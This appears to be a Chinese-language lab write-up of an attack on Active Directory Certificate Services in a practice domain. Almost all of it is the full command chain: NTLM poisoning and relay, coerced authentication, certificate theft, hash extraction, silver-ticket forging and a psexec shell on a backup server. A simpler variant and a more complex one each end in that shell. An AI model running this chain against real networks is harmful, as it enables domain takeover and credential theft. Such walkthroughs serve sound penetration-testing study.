记一次ADCS攻击测试

记一次ADCS攻击测试

Adil 1 2025-09-23

一、环境情况

  • DC172.16.119.3
  • SQL03172.16.119.80
  • backup01172.16.119.70

参考链接:

二、攻击利用

2.1 方式2-简化版

  • 开启投毒
    • 防止Responder开启SMB、HTTP:sed -i "s/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/" Responder.conf
    • 污染网络:python3 Responder.py -I ens192

image-20231217183625644

  • 创建机器账户
    • ntlmrelayx.py -t ldap://172.16.119.3 -smb2support --no-da --no-acl --add-computer 'adil$' '@adil123456#'

image-20231217183743693

  • 检查ADCS漏洞是否存在:
    • certipy find -enabled -u 'adil$'@172.16.119.3 -p '@adil123456#' -stdout

image-20231217192220722

  • 开启ADCS中继服务
    • 注意:结果触发在后续的强制验证后才能取得机器账户的证书
    • certipy relay -target "http://172.16.119.3" -template Machine

image-20231217184257770

  • 强制验证服务器
    • Coercer coerce -t 172.16.119.70 -l 172.16.119.30 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v --always-continue

image-20231217184138236

  • 利用证书取得机器哈希:
    • certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3

image-20231217184709169

  • 取得域内对象的SID
    • 注意:此处对我们有用的是域的SID
    • lookupsid.py 'INLANEFREIGHT.LOCAL/backup01$'@172.16.119.3 -hashes :4167bb56243a273cf9dfa53c3ea859f0

image-20231217185012909

  • 申请取得白银票据
    • 需求要素:账户哈希、域SID、机器名
    • ticketer.py -nthash 4167bb56243a273cf9dfa53c3ea859f0 -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator

image-20231217185324136

  • 修改hosts文件
    • vi /etc/hosts
    • 注意:不修改hosts文件将导致后续使用票据时报错

image-20231217185557842

  • 取得目标主机shell
    • KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass backup01.inlanefreight.local

image-20231217185715936

2.2 方式1-复杂版

  • 利用较为麻烦,仅记录一些使用命令。
强制开启WEBDEV:
crackmapexec smb 172.16.119.3 -u adil$ -p '@adil123456#' -M drop-sc -o URL=https://172.16.119.20/testing FILENAME=@secret


crackmapexec smb 172.16.119.0/24 -u adil$ -p @adil123456# -M webdav

crackmapexec smb 172.16.117.0/24 -u adil$ -p '@adil123456#' --shares




# 强制认证:
python3 printerbug.py inlanefreight/adil$:'@adil123456#'@172.16.119.3 172.16.119.20

Coercer scan -t 172.16.119.70 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v


# ADCS-backup
crackmapexec ldap 172.16.119.0/24 -u 'adil$' -p '@adil123456#' -M adcs


crackmapexec ldap 172.16.119.3 -u adil$ -p '@adil123456#' -M adcs -o SERVER=INLANEFREIGHT-DC01-CA

certipy find -enabled -u 'adil$'@172.16.119.3 -p '@adil123456#' -stdout

curl -I http://172.16.119.3/certsrv/


sudo ntlmrelayx.py -t http://172.16.119.3/certsrv/certfnsh.asp -smb2support --adcs --template Machine

Coercer scan -t 172.16.119.70 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v



python3 gettgtpkinit.py -dc-ip 172.16.119.3 -cert-pfx ws01.pfx 'INLANEFREIGHT.LOCAL/BACKUP01$' BACKUP01.ccache


KRB5CCNAME=BACKUP01.ccache python3 getnthash.py 'INLANEFREIGHT.LOCAL/BACKUP01$' -key e637a8ea44a66d34c57a40b53179221904967f41193b664ad5eecc6304830925

哈希
191d3107d6c73fd5dffb058757fe4e27


ticketer.py -nthash 191d3107d6c73fd5dffb058757fe4e27 -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator


KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass backup01.inlanefreight.local